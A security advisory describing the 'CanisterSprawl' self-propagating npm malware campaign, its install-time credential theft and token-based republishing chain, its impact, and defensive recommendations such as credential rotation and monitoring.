CanisterSprawl: Self-Propagating npm Malware Campaign

The CanisterSprawl campaign, first disclosed in April 2026, is a self-propagating malware targeting npm packages. This campaign focuses on stealing sensitive information, such as API keys, authentication tokens, and crypto wallet data from developer environments. The malware attempts to automate the process of publishing malicious packages to the npm registry using compromised developer accounts. By hijacking trusted credentials, CanisterSprawl seeks to extend its reach within the open-source ecosystem, turning a single compromised machine into a potential source of widespread supply chain attacks. This campaign highlights the need for robust security measures to prevent the installation of malicious packages and detect unauthorized activity within developer environments.

Attack Chain

1. A developer installs a malicious npm package from the npm registry.
2. During installation, the package executes embedded code automatically.
3. The malware scans environment variables on the local system, looking for credentials and developer tokens.
4. The malware harvests browser credentials, crypto wallet data, and configuration files containing credentials.
5. The collected data is exfiltrated to an external server controlled by the attacker.
6. The malware attempts to locate an npm automation token on the infected machine.
7. If a token is found, the malware lists all packages to which the token grants “write” access.
8. The malware downloads the packages, injects the malicious script into them, and republishes them to the npm registry, spreading the infection to other projects.

Impact

Successful CanisterSprawl infections can lead to the exfiltration of sensitive data, including API keys, authentication tokens, and credentials, which can be used to gain unauthorized access to internal systems and services. The malware’s self-propagating nature allows it to spread through the npm ecosystem, potentially compromising numerous projects and developer accounts. If successful, attackers can inject malicious code into trusted packages, leading to supply chain attacks that affect a large number of downstream consumers. This can damage the reputation of affected developers and organizations, and result in significant financial losses.

Recommendation

• Remove any identified malicious packages immediately to prevent further data theft and propagation.
• Rotate potentially compromised credentials, tokens, and API keys that may have been exposed from affected hosts.
• Review environment variables and local credentials on developer machines for potential compromise.
• Audit account activity for unauthorized publishing or access to the npm registry, as highlighted in the Overview section.
• Deploy the Sigma rule to detect suspicious processes attempting to access sensitive files related to credentials.
• Enable file integrity monitoring for common credential storage locations and configuration files to detect unauthorized access and modifications.